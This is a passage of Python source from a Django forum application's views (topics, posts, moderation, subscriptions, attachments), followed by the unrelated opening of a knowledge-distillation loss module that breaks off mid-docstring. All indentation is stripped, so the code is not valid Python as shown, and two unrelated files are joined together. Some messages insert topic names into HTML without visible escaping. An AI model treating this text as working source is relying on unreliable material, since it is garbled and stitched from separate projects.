to_url = redirection.to_topic.get_absolute_url()
if redirection.is_type_permanent():
return redirect(to_url, permanent=True)
elif redirection.is_type_expiring():
if redirection.is_expired():
raise Http404
return redirect(to_url)
elif redirection.is_type_no():
raise Http404
page = kwargs.get('page', None)
if page:
page = int(page)
if page == 1:
return redirect(topic.get_absolute_url(), permanent=True)
topic.views += 1
Topic.objects.filter(pk=topic.pk).update(views=topic.views)
return self.render_to_response(context)
def get_topic(self):
self.topic = get_object_or_404(Topic.objects.all().select_related('forum'),
pk=self.kwargs['pk'])
return self.topic
def get_queryset(self):
if not self.topic.is_accessible_by(self.request.user):
raise Http404
qs = (self.topic.posts.all()
.filter_by_user(self.topic, self.request.user)
.order_by('created'))
return qs
def get_context_data(self, **kwargs):
ctx = super(TopicDetailView, self).get_context_data(**kwargs)
self.topic.post_counts = {
self.request.user: ctx['paginator'].count
}
page_number = ctx['page_obj'].number
start = page_number
if page_number > 1:
start = (start - 1) * ctx['paginator'].per_page + 1
for idx, post in enumerate(ctx[self.context_object_name], start):
post.topic = self.topic
post.index = idx
ctx['topic'] = self.topic
ctx['subscription_types'] = Subscription.TYPE_CHOICES
ctx['redirect'] = self.request.GET.get('redirect', False)
if self.request.user.is_authenticated:
self.request.user.is_moderator = self.topic.is_moderated_by(self.request.user)
self.request.user.is_subscribed = self.topic.is_subscribed_by(self.request.user)
self.topic.mark_as_read(self.request.user)
if (self.topic.poll_id and
pybb_topic_poll_not_voted(self.topic.poll, self.request.user)):
try:
ctx['poll_form'] = PollForm(self.topic.poll)
except Poll.DoesNotExist:
pass
try:
subscription = self.request.user.subscription_set.get(topic=self.topic)
ctx['current_subscription_type'] = ctx['subscription_types'][subscription.type]
except Subscription.DoesNotExist:
ctx['current_subscription_type'] = Subscription.TYPE_CHOICES[0]
if defaults.PYBB_FREEZE_FIRST_POST:
ctx['first_post'] = self.topic.head
else:
ctx['first_post'] = None
return ctx
class PostUpdateMixin(object):
def get_form_class(self):
if self.request.user.is_staff or self.request.user.is_superuser:
return AdminPostForm
return PostForm
def get_context_data(self, **kwargs):
ctx = super(PostUpdateMixin, self).get_context_data(**kwargs)
instance = None
if getattr(self, 'object'):
instance = self.object.topic.poll
if 'pollformset' not in kwargs:
pollformset = PollAnswerFormSet(instance=instance)
ctx['pollformset'] = pollformset
return ctx
def get_form_kwargs(self):
form_kwargs = super(PostUpdateMixin, self).get_form_kwargs()
if self.request.user.is_staff and self.object:
form_kwargs['initial']['login'] = self.object.user
return form_kwargs
def form_valid(self, form):
success = True
with getattr(transaction, 'atomic', getattr(transaction, 'commit_manually', None))():
sid = transaction.savepoint()
try:
self.object = form.save()
if self.object.topic.poll:
if self.object.topic.head == self.object:
pollformset = PollAnswerFormSet(self.request.POST,
instance=self.object.topic.poll)
if pollformset.is_valid():
pollformset.save()
else:
success = False
else:
success = True
if success:
transaction.savepoint_commit(sid)
else:
transaction.savepoint_rollback(sid)
except Exception as e:
transaction.savepoint_rollback(sid)
raise e
if success:
return super(ModelFormMixin, self).form_valid(form)
context = self.get_context_data(form=form,
pollformset=pollformset)
return self.render_to_response(context)
class BasePostCreateView(PostUpdateMixin, generic.CreateView):
template_name = 'pybb/post/create.html'
def get_form_kwargs(self):
ip = self.request.META.get('REMOTE_ADDR', '')
form_kwargs = super(BasePostCreateView, self).get_form_kwargs()
form_kwargs.update(dict(topic=self.topic, forum=self.forum, user=self.user,
ip=ip, initial={}))
if self.user.is_staff:
form_kwargs['initial']['login'] = self.user
return form_kwargs
def get_context_data(self, **kwargs):
ctx = super(BasePostCreateView, self).get_context_data(**kwargs)
ctx['forum'] = self.forum
ctx['topic'] = self.topic
return ctx
def get_success_url(self):
if (not self.request.user.is_authenticated and
defaults.PYBB_PREMODERATION):
return reverse('pybb:index')
return self.object.get_anchor_url(self.request.user)
def get_parents(self, request, *args, **kwargs):
self.forum = None
self.topic = None
data = request.POST or {}
forum_id = kwargs.get('forum_id', None) or data.get('forum_id', None)
topic_id = kwargs.get('topic_id', None) or data.get('topic_id', None)
if forum_id:
self.forum = get_object_or_404(filter_hidden(request, Forum), pk=forum_id)
self.forum.prefetch_parent_forums()
elif topic_id:
self.topic = get_object_or_404(Topic.objects.visible(), pk=topic_id)
self.topic.prefetch_parent_forums()
if not self.topic.is_accessible_by(request.user):
raise Http404
if self.topic.closed:
raise PermissionDenied
@method_decorator(csrf_protect)
def dispatch(self, request, *args, **kwargs):
if request.user.is_authenticated:
self.user = request.user
else:
if not defaults.PYBB_ENABLE_ANONYMOUS_POST:
return redirect_to_login(request.build_absolute_uri())
User = get_user_model()
self.user, new = User.objects.get_or_create(username=defaults.PYBB_ANONYMOUS_USERNAME)
self.get_parents(request, *args, **kwargs)
result = all([load_class(pre_post_create_filter)(
topic=self.topic,
request=request,
forum=self.forum,
).is_allowed(request.user) for pre_post_create_filter in defaults.PYBB_PRE_POST_CREATE_FILTERS])
if not result:
raise PermissionDenied
return super(BasePostCreateView, self).dispatch(request, *args, **kwargs)
class PostCreateView(BasePostCreateView):
def get_context_data(self, **kwargs):
ctx = super(PostCreateView, self).get_context_data(**kwargs)
ctx['post_list'] = []
if self.topic:
qs = (self.topic.posts.all()
.select_related('user')
.order_by('-created')
.filter_by_user(self.topic, self.request.user))
ctx['post_count'] = qs.count()
posts = qs[:defaults.PYBB_POST_LIST_SIZE]
for post in posts:
post.topic = self.topic
ctx['post_list'] = posts
ctx['post_page_size'] = defaults.PYBB_POST_LIST_SIZE
return ctx
class PostUpdateView(PostUpdateMixin, generic.UpdateView):
model = Post
context_object_name = 'post'
template_name = 'pybb/post/update.html'
def get_form_kwargs(self):
form_kwargs = super(PostUpdateView, self).get_form_kwargs()
form_kwargs.update(dict(actor=self.request.user))
return form_kwargs
@method_decorator(login_required)
@method_decorator(csrf_protect)
def dispatch(self, request, *args, **kwargs):
return super(PostUpdateView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
post = super(PostUpdateView, self).get_object(queryset)
if not post.is_editable_by(self.request.user, 'can_change_post'):
raise PermissionDenied
return post
def get_success_url(self, *args, **kwargs):
if self.request.user.pk != self.object.user_id:
LogModeration.objects.log(
user=self.request.user,
obj=self.object,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_MEDIUM,
)
return super(PostUpdateView, self).get_success_url(*args, **kwargs)
class PostsCreateView(generic.RedirectView):
http_method_names = ['post']
permanent = True
def get_redirect_url(self, **kwargs):
if 'topic_id' not in self.request.POST:
raise Http404
try:
pk = int(self.request.POST.get('topic_id', None))
except ValueError:
raise Http404
return reverse('pybb:post_create', kwargs={
'topic_id': pk
})
class PostRedirectView(generic.RedirectView):
http_method_names = ['post', 'get']
permanent = True
def get_redirect_url(self, **kwargs):
if self.request.method == 'POST':
if 'post_id' not in self.request.POST:
raise Http404
try:
pk = int(self.request.POST.get('post_id', None))
except ValueError:
raise Http404
else:
pk = kwargs.get('post_id', None)
if not pk:
raise Http404
post = get_object_or_404(Post, pk=pk)
if not post.is_accessible_by(self.request.user):
raise PermissionDenied
return post.get_anchor_url(self.request.user, {'redirect': 1})
class PostModerateView(generic.RedirectView):
permanent = False
def get_redirect_url(self, **kwargs):
post = get_object_or_404(Post, pk=self.kwargs['pk'])
if not post.topic.is_moderated_by(self.request.user):
raise PermissionDenied
post.on_moderation = not post.on_moderation
post.save()
if post.on_moderation:
change_message = _('%s is now on moderation') % post
else:
change_message = _('%s is not on moderation anymore') % post
LogModeration.objects.log(
user=self.request.user,
obj=post,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_MEDIUM,
change_message=change_message
)
return post.get_anchor_url(self.request.user)
class PostDeleteView(generic.DeleteView):
template_name = 'pybb/post/delete.html'
context_object_name = 'post'
def get_object(self, queryset=None):
post = get_object_or_404(Post.objects.select_related('topic', 'topic__forum'),
pk=self.kwargs['pk'])
self.topic = post.topic
self.forum = post.topic.forum
if (not self.topic.is_moderated_by(self.request.user, 'can_delete_post') and
not post.user == self.request.user):
raise PermissionDenied
return post
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.deleted:
self.object.mark_as_deleted(user=self.request.user)
else:
self.object.mark_as_undeleted()
return redirect(self.get_success_url())
def get_success_url(self):
if self.object.deleted:
messages.success(self.request, _('Your post has been successfully deleted'))
else:
messages.success(self.request, _('Your post has been successfully restored'))
if self.request.user.pk != self.object.user_id:
LogModeration.objects.log(
user=self.request.user,
obj=self.object,
action_flag=LogModeration.ACTION_FLAG_DELETION,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH,
)
try:
Topic.objects.filter(deleted=False).get(pk=self.topic.id)
except Topic.DoesNotExist:
return self.forum.get_absolute_url()
else:
return self.topic.get_absolute_url()
class PostsMoveView(generic.FormView):
http_method_names = ['post']
choice = {
'0': ('new_topic_form', PostsMoveNewTopicForm),
'1': ('existing_topic_form', PostsMoveExistingTopicForm),
}
template_name = 'pybb/post/move.html'
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(PostsMoveView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
return kwargs
def post(self, request, *args, **kwargs):
forms = {}
context = {}
post_ids = self.request.POST.getlist('post_ids')
context['post_ids'] = post_ids
posts = (Post.objects.filter(pk__in=post_ids)
.select_related('topic', 'topic__forum'))
context['posts'] = posts
if not len(posts):
raise Http404
for post in posts:
if (not post.topic.is_moderated_by(self.request.user, 'can_move_post')):
raise PermissionDenied
for key, (form_name, form_class) in self.choice.items():
form = form_class(request.POST if 'submit' in request.POST else None,
posts=posts, user=request.user)
forms[key] = form
context[form_name] = form
if 'submit' in request.POST:
choice = request.POST.get('choice', '0')
if choice in forms:
form = forms[choice]
if form.is_valid():
topic = form.save()
return redirect(topic.get_absolute_url())
return self.render_to_response(context)
class TopicBatchView(generic.FormView):
http_method_names = ['post']
def get_context_data(self, **kwargs):
return dict(super(TopicBatchView, self).get_context_data(**kwargs), **{
'topic_ids': self.request.POST.getlist('topic_ids')
})
def get_initial(self):
return {}
def get_queryset(self):
return Topic.objects.visible().filter(pk__in=self.request.POST.getlist('topic_ids'))
def get_form_class(self):
topics = self.get_queryset()
if not len(topics):
raise Http404
for topic in topics:
if (not topic.is_moderated_by(self.request.user, self.permission_name)):
raise PermissionDenied
return self.get_formset_class(topics=topics)
def get_formset_class(self, **kwargs):
pass
def get_form_kwargs(self):
"""
Returns the keyword arguments for instanciating the form.
"""
kwargs = {'initial': self.get_initial()}
if self.request.method in ('POST', 'PUT') and 'submit' in self.request.POST:
kwargs.update({
'data': self.request.POST,
'files': self.request.FILES,
})
return kwargs
def post(self, request, *args, **kwargs):
form_class = self.get_form_class()
form = self.get_form(form_class)
if 'submit' in request.POST:
if form.is_valid():
return self.form_valid(form)
return self.form_invalid(form)
return self.render_to_response(self.get_context_data(form=form))
def form_valid(self, formset):
topics = []
for form in formset:
topics.append((form.topic, form.save()))
return redirect(self.get_success_url(topics))
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicBatchView, self).dispatch(request, *args, **kwargs)
def get_success_url(self, topics):
return reverse('pybb:index')
class TopicMergeView(TopicBatchView):
template_name = 'pybb/topic/merge.html'
permission_name = 'can_merge_topic'
def get_formset_class(self, **kwargs):
return get_topic_merge_formset(**kwargs)
def get_success_url(self, topics):
for old_topic, new_topic in topics:
messages.success(self.request, _('<a href="%(old_topic_url)s">%(old_topic)s</a> successfully merged to <a href="%(new_topic_url)s">%(new_topic)s</a>') % {
'old_topic_url': old_topic.get_absolute_url(),
'old_topic': old_topic,
'new_topic_url': new_topic.get_absolute_url(),
'new_topic': new_topic
})
return reverse('pybb:index')
class TopicMoveView(TopicBatchView):
template_name = 'pybb/topic/move.html'
permission_name = 'can_move_topic'
def get_formset_class(self, **kwargs):
return get_topic_move_formset(**kwargs)
def get_success_url(self, topics):
for old_topic, new_topic in topics:
messages.success(self.request, _('<a href="%(old_topic_url)s">%(old_topic)s</a> successfully moved to <a href="%(new_topic_url)s">%(new_topic)s</a>') % {
'old_topic_url': old_topic.get_absolute_url(),
'old_topic': old_topic,
'new_topic_url': new_topic.get_absolute_url(),
'new_topic': new_topic
})
return reverse('pybb:index')
class TopicsDeleteView(TopicBatchView):
template_name = 'pybb/topic/delete.html'
permission_name = 'can_delete_topic'
def get_queryset(self):
return Topic.objects.filter(pk__in=self.request.POST.getlist('topic_ids'))
def get_context_data(self, **kwargs):
context = dict(super(TopicBatchView, self).get_context_data(**kwargs), **{
'topic_ids': self.request.POST.getlist('topic_ids'),
})
formset = context['form']
topics = defaultdict(list)
for form in formset.forms:
if form.topic.deleted:
topics['to_restore'].append(form)
else:
topics['to_delete'].append(form)
context['topics'] = dict(topics)
return context
def get_formset_class(self, **kwargs):
return get_topic_delete_formset(**kwargs)
def form_valid(self, formset):
topics = []
for form in formset:
topics.append(form.save())
return redirect(self.get_success_url(topics))
def get_success_url(self, topics):
sorted_topics = defaultdict(list)
for topic in topics:
if topic.deleted:
sorted_topics['deleted'].append(topic)
else:
sorted_topics['restored'].append(topic)
actions = {
'deleted': _('deleted'),
'restored': _('restored'),
}
for key in ('deleted', 'restored', ):
if key in sorted_topics:
messages.success(self.request, _('%(topics)s successfully %(action)s') % {
'topics': ' '.join(['<a href="%(topic_url)s">%(topic)s</a>' % {
'topic_url': topic.get_absolute_url(),
'topic': topic
} for topic in sorted_topics[key]]),
'action': actions[key]
})
return reverse('pybb:index')
class TopicDeleteView(generic.DeleteView):
template_name = 'pybb/topic/delete.html'
context_object_name = 'topic'
def get_object(self, queryset=None):
topic = get_object_or_404(Topic.objects.select_related('forum'),
pk=self.kwargs['pk'])
self.topic = topic
self.forum = topic.forum
if not self.topic.is_moderated_by(self.request.user, 'can_delete_topic'):
raise PermissionDenied
return topic
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.deleted:
self.object.mark_as_deleted()
else:
self.object.mark_as_undeleted()
return redirect(self.get_success_url())
def get_success_url(self):
if self.object.deleted:
LogModeration.objects.log(
user=self.request.user,
obj=self.object,
action_flag=LogModeration.ACTION_FLAG_DELETION,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH,
)
return self.forum.get_absolute_url()
class TopicActionBaseView(generic.View):
def get_topic(self):
topic = get_object_or_404(Topic, pk=self.kwargs['pk'])
if not self.is_allowed(topic, self.request.user):
raise PermissionDenied
return topic
def is_allowed(self, topic, user, permission=None):
return topic.is_moderated_by(user, permission=permission)
@method_decorator(login_required)
def get(self, *args, **kwargs):
self.topic = self.get_topic()
self.action(self.topic)
LogModeration.objects.log(
user=self.request.user,
obj=self.topic,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH,
change_message=self.get_change_message(self.topic)
)
return redirect(self.topic.get_absolute_url())
def get_change_message(self, topic):
return ''
class TopicStickView(TopicActionBaseView):
def action(self, topic):
topic.sticky = True
topic.save()
def is_allowed(self, topic, user):
return super(TopicStickView, self).is_allowed(topic, user, 'can_stick_topic')
def get_change_message(self, topic):
return _('Stick topic %s') % topic.name
class TopicUnstickView(TopicActionBaseView):
def action(self, topic):
topic.sticky = False
topic.save()
def is_allowed(self, topic, user):
return super(TopicUnstickView, self).is_allowed(topic, user, 'can_unstick_topic')
def get_change_message(self, topic):
return _('Unstick topic %s') % topic.name
class TopicCloseView(TopicActionBaseView):
def action(self, topic):
topic.closed = True
topic.save()
def is_allowed(self, topic, user):
return super(TopicCloseView, self).is_allowed(topic, user, 'can_close_topic')
def get_change_message(self, topic):
return _('Close topic %s') % topic.name
class TopicTrackerRedirectView(generic.RedirectView):
http_method_names = ['get']
permanent = True
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicTrackerRedirectView, self).dispatch(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
topic = get_object_or_404(Topic, pk=kwargs.get('topic_id'))
tracker = None
try:
tracker = TopicReadTracker.objects.get(topic=topic, user=self.request.user)
except TopicReadTracker.DoesNotExist:
try:
tracker = ForumReadTracker.objects.get(forum=topic.forum, user=self.request.user)
except ForumReadTracker.DoesNotExist:
pass
if not tracker:
return topic.get_absolute_url()
try:
post = topic.posts.visible().filter(created__gte=tracker.time_stamp).order_by('created')[0]
except IndexError:
try:
return topic.last_post.get_absolute_url()
except Post.DoesNotExist:
return topic.get_absolute_url()
else:
return post.get_anchor_url(user=self.request.user)
class TopicOpenView(TopicActionBaseView):
def action(self, topic):
topic.closed = False
topic.save()
def is_allowed(self, topic, user):
return super(TopicOpenView, self).is_allowed(topic, user, 'can_open_topic')
def get_change_message(self, topic):
return _('Open topic %s') % topic.name
class TopicPollVoteView(generic.UpdateView):
queryset = Topic.objects.visible().filter(poll__isnull=False).select_related('poll')
http_method_names = ['post', ]
form_class = PollForm
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicPollVoteView, self).dispatch(request, *args, **kwargs)
def get_form_kwargs(self):
kwargs = super(ModelFormMixin, self).get_form_kwargs()
kwargs['poll'] = self.object.poll
return kwargs
def form_valid(self, form):
# already voted
if not pybb_topic_poll_not_voted(self.object.poll, self.request.user):
return HttpResponseBadRequest()
answers = form.cleaned_data['answers']
for answer in answers:
# poll answer from another topic
if answer.poll != self.object.poll:
return HttpResponseBadRequest()
PollAnswerUser.objects.create(poll_answer=answer,
user=self.request.user)
return super(ModelFormMixin, self).form_valid(form)
def form_invalid(self, form):
return self.object.get_absolute_url()
def get_success_url(self):
return self.object.get_absolute_url()
class ModeratorListView(ListView):
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
paginator_class = Paginator
template_name = 'pybb/moderation/moderator/list.html'
context_object_name = 'moderator_list'
model = Moderator
allow_empty_page = True
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ModeratorListView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
return dict(super(ModeratorListView, self).get_context_data(**kwargs), **{
'object': self.object
})
def get_object(self):
self.object = get_object_or_404(Forum, pk=self.kwargs.get('pk'))
return self.object
def get_queryset(self):
return self.model.objects.filter(forum=self.get_object())
class ModeratorDetailView(generic.DetailView, FormMixin):
template_name = 'pybb/moderation/moderator/detail.html'
model = Moderator
pk_url_kwarg = 'moderator_id'
context_object_name = 'moderator'
form_class = ModerationForm
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ModeratorDetailView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
self.forum = get_object_or_404(Forum, pk=self.kwargs.get('forum_id'))
return self.model.objects.filter(forum=self.forum)
def get_context_data(self, **kwargs):
return dict(super(ModeratorDetailView, self).get_context_data(**kwargs), **{
'forum': self.forum,
'forms': self.get_forms(self.get_form_class()),
})
def get_forms(self, form_class):
return [form_class(permissions=self.get_permissions(defaults.PYBB_FORUM_PERMISSIONS, Forum),
obj=self.forum,
user=self.object.user,
**self.get_form_kwargs()),
form_class(permissions=self.get_permissions(defaults.PYBB_USER_PERMISSIONS),
user=self.object.user,
**self.get_form_kwargs())]
def post(self, request, *args, **kwargs):
self.object = self.get_object()
context = self.get_context_data(object=self.object)
forms = context['forms']
if all([form.is_valid() for form in forms]):
return self.form_valid(forms)
return self.form_invalid(forms)
def form_valid(self, forms):
for form in forms:
form.save(self.object.user)
return redirect(self.get_success_url())
def get_permissions(self, codenames, model_class=None):
filters = {
'codename__in': codenames
}
if model_class:
filters['content_type'] = ContentType.objects.get_for_model(model_class)
return Permission.objects.filter(**filters)
def get_success_url(self):
names = [permission.name
for permission in self.object.user.user_permissions.all()]
change_message = _('Changed permissions:\n %s') % '\n'.join(names)
LogModeration.objects.log(
user=self.request.user,
obj=self.forum,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
target=self.object.user,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_MEDIUM,
change_message=change_message
)
messages.success(self.request, _('Permissions for moderator "%(username)s" successfully saved') % {
'username': self.object.user.username
})
return reverse('pybb:moderator_detail', kwargs={
'forum_id': self.forum.pk,
'moderator_id': self.object.pk
})
class ModeratorCreateView(ModeratorDetailView):
template_name = 'pybb/moderation/moderator/create.html'
model = Forum
pk_url_kwarg = 'forum_id'
context_object_name = 'forum'
def get_context_data(self, **kwargs):
self.forum = self.object
return super(ModeratorCreateView, self).get_context_data(**kwargs)
def get_forms(self, form_class):
forms = [SearchUserForm(**self.get_form_kwargs()),
self.form_class(permissions=self.get_permissions(defaults.PYBB_FORUM_PERMISSIONS, Forum),
obj=self.forum,
**self.get_form_kwargs()),
self.form_class(permissions=self.get_permissions(defaults.PYBB_USER_PERMISSIONS),
**self.get_form_kwargs())]
return forms
def get_queryset(self):
return self.model.objects.all()
def form_valid(self, forms):
user_form = forms.pop(0)
user = user_form.get_user(user_form.cleaned_data['username'])
moderator = Moderator.objects.create(forum=self.forum, user=user)
for form in forms:
form.save(user)
return redirect(self.get_success_url(moderator))
def get_success_url(self, moderator):
LogModeration.objects.log(
user=self.request.user,
obj=self.forum,
action_flag=LogModeration.ACTION_FLAG_ADDITION,
target=moderator.user,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH
)
messages.success(self.request, _('New moderator "%(username)s" created') % {
'username': moderator.user.username
})
return reverse('pybb:moderator_detail', kwargs={
'forum_id': self.forum.pk,
'moderator_id': moderator.pk
})
class ModeratorDeleteView(generic.DeleteView):
template_name = 'pybb/moderation/moderator/delete.html'
context_object_name = 'moderator'
model = Moderator
pk_url_kwarg = 'moderator_id'
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ModeratorDeleteView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
self.forum = get_object_or_404(Forum, pk=self.kwargs['forum_id'])
moderator = get_object_or_404(self.model.objects.filter(forum=self.forum),
pk=self.kwargs[self.pk_url_kwarg])
return moderator
def get_success_url(self):
LogModeration.objects.log(
user=self.request.user,
obj=self.forum,
action_flag=LogModeration.ACTION_FLAG_DELETION,
target=self.object.user,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH
)
return reverse('pybb:moderator_list', kwargs={
'pk': self.forum.pk
})
def get_context_data(self, **kwargs):
return dict(super(ModeratorDeleteView, self).get_context_data(**kwargs), **{
'forum': self.forum
})
class SubscriptionChangeView(generic.RedirectView):
http_method_names = ['post']
permanent = False
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(SubscriptionChangeView, self).dispatch(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
if 'topic_ids' not in self.request.POST or 'type' not in self.request.POST:
raise Http404
try:
type = int(self.request.POST['type'])
except ValueError:
raise Http404
types = dict(Subscription.TYPE_CHOICES)
if type not in types:
raise Http404
topic_ids = self.request.POST.getlist('topic_ids')
subscriptions = (Subscription.objects.filter(topic__in=topic_ids,
user=self.request.user)
.exclude(type=type)
.select_related('topic'))
subscriptions.update(type=type)
messages.success(self.request, _('Your subscriptions has been updated: %(type)s') % {
'type': types[type]
})
return reverse('pybb:subscription_list')
class SubscriptionDeleteView(generic.RedirectView):
http_method_names = ['post']
permanent = False
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(SubscriptionDeleteView, self).dispatch(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
if 'topic_ids' not in self.request.POST and 'topic_id' not in self.request.POST:
raise Http404
topic = None
if 'topic_ids' in self.request.POST:
topic_ids = self.request.POST.getlist('topic_ids')
else:
topic_id = self.request.POST.get('topic_id')
topic_ids = [topic_id, ]
topic = get_object_or_404(Topic, pk=topic_id)
Subscription.objects.filter(topic__in=topic_ids, user=self.request.user).delete()
if not topic:
messages.success(self.request, _('Your subscriptions has been deleted'))
return reverse('pybb:subscription_list')
messages.success(self.request, _('Your subscription to %(topic)s has been deleted') % {
'topic': topic
})
return topic.get_absolute_url()
class SubscriptionListView(ListView):
template_name = 'pybb/user/subscription_list.html'
context_object_name = 'subscription_list'
model = Subscription
paginate_by = defaults.PYBB_FORUM_PAGE_SIZE
paginator_class = Paginator
allow_empty_page = True
prefetch_fields = ('topic__user', 'topic__last_post', 'topic__last_post__user')
prefetch_profiles = ('topic__user', 'topic__last_post__user')
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(SubscriptionListView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(SubscriptionListView, self).get_context_data(**kwargs)
context['topic_list'] = [subscription.topic for subscription in context[self.context_object_name]]
context['subscription_types'] = Subscription.TYPE_CHOICES
return context
def get_queryset(self):
qs = (self.model.objects.order_by('-topic__updated')
.filter(user=self.request.user)
.select_related('topic__forum')
.visible())
return qs
@require_http_methods(['POST'])
@login_required
def create_subscription(request):
try:
topic_id = request.POST.get('topic_id', None)
type = request.POST.get('type', Subscription.TYPE_NO_ALERT)
if not topic_id:
raise PermissionDenied
topic_id = int(topic_id)
except ValueError:
raise PermissionDenied
topic = get_object_or_404(Topic, pk=topic_id)
subscription, created = Subscription.objects.get_or_create(user=request.user,
topic=topic)
subscription.type = type
subscription.save()
if created:
messages.success(request, _('Your subscription to %(topic)s has been created: %(type)s') % {
'topic': topic,
'type': subscription.get_type_display()
})
else:
messages.success(request, _('Your subscription to %(topic)s has been updated: %(type)s') % {
'topic': topic,
'type': subscription.get_type_display()
})
return redirect(topic.get_absolute_url())
@require_http_methods(['POST'])
@login_required
def post_preview(request, template_name='pybb/post/template.html'):
content = request.POST.get('data')
post = Post(body=content, user=request.user)
post.body_html = markup(content, obj=post)
post.created = datetime.now()
return render(request, template_name, {
'post': post
})
class ForumMarkAsReadView(generic.View):
model = ForumReadTracker
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(ForumMarkAsReadView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
self.model.objects.mark_as_read(request.user, filter_hidden(request, Forum))
TopicReadTracker.objects.filter(user=request.user).delete()
Subscription.objects.filter(user=request.user).update(sent=False)
messages.success(request, _('All forums marked as read'), fail_silently=True)
return redirect(reverse('pybb:index'))
def post(self, request, *args, **kwargs):
try:
forum_id = int(request.POST.get('forum_id', None))
except ValueError:
raise PermissionDenied
else:
parent_forum = get_object_or_404(filter_hidden(request, Forum), pk=forum_id)
forums = [parent_forum, ] + list(Forum.objects.children(parent_forum))
self.model.objects.mark_as_read(request.user, forums)
for forum in forums:
TopicReadTracker.objects.filter(user=request.user, topic__forum=forum).delete()
Subscription.objects.filter(user=request.user, topic__forum=forum).update(sent=False)
messages.success(request, _('Forum %s has been marked as read') % parent_forum, fail_silently=True)
return redirect(parent_forum.get_absolute_url())
class AttachmentDeleteView(generic.DeleteView):
template_name = 'pybb/attachment/delete.html'
context_object_name = 'attachment'
model = Attachment
def get_object(self, queryset=None):
attachment = get_object_or_404(self.model,
pk=self.kwargs['pk'])
if attachment.post_id:
if not attachment.post.is_editable_by(self.request.user, 'can_change_attachment'):
raise PermissionDenied
else:
if not attachment.user == self.request.user:
raise PermissionDenied
return attachment
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(AttachmentDeleteView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return self.model.objects.filter(user=self.request.user)
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.delete()
if not self.request.is_ajax():
return redirect(self.get_success_url())
return HttpResponse('Ok')
def get_success_url(self):
if self.object.post_id:
return self.object.post.get_absolute_url()
return reverse('pybb:index')
class AttachmentListView(TemplateResponseMixin, generic.View):
template_name = 'pybb/attachment/list.html'
form_class = AttachmentFormSet
http_method_names = ['post']
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(AttachmentListView, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
self.request = request
ctx = {}
try:
post_hash = self.request.POST['post_hash']
except ValueError:
raise Http404
ctx['post_hash'] = post_hash
try:
self.object = Post.objects.get(hash=post_hash)
except Post.DoesNotExist:
self.object = None
else:
if not self.object.is_editable_by(request.user, 'can_change_attachment'):
raise Http404
if 'submit' in self.request.POST:
aformset = self.form_class(self.request.POST, self.request.FILES)
if aformset.is_valid():
instances = aformset.save(commit=False)
for instance in instances:
instance.post_hash = post_hash
if self.object:
instance.post = self.object
else:
instance.post = None
instance.user = self.request.user
instance.save()
aformset = self.form_class()
else:
aformset = self.form_class()
ctx['aformset'] = aformset
if self.object:
ctx['attachments'] = self.object.attachments.all()
else:
ctx['attachments'] = Attachment.objects.filter(post_hash=post_hash)
return self.render_to_response(ctx)
| |
# Adopted from https://github.com/airaria/TextBrewer
# Apache License Version 2.0
import torch
import torch.nn.functional as F
from hanlp_common.configurable import AutoConfigurable
def kd_mse_loss(logits_S, logits_T, temperature=1):
'''
Calculate the mse loss between logits_S and logits_T
:param logits_S: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param logits_T: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param temperature: A float or a tensor of shape (batch_size, length) or (batch_size,)
'''
if isinstance(temperature, torch.Tensor) and temperature.dim() > 0:
temperature = temperature.unsqueeze(-1)
beta_logits_T = logits_T / temperature
beta_logits_S = logits_S / temperature
loss = F.mse_loss(beta_logits_S, beta_logits_T)
return loss
def kd_ce_loss(logits_S, logits_T, temperature=1):
'''
Calculate the cross entropy between logits_S and logits_T
:param logits_S: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param logits_T: Tensor of shape (batch_size, length, num_labels) or (batch_size, num_labels)
:param temperature: A float or a tensor of shape (batch_size, length) or (batch_size,)
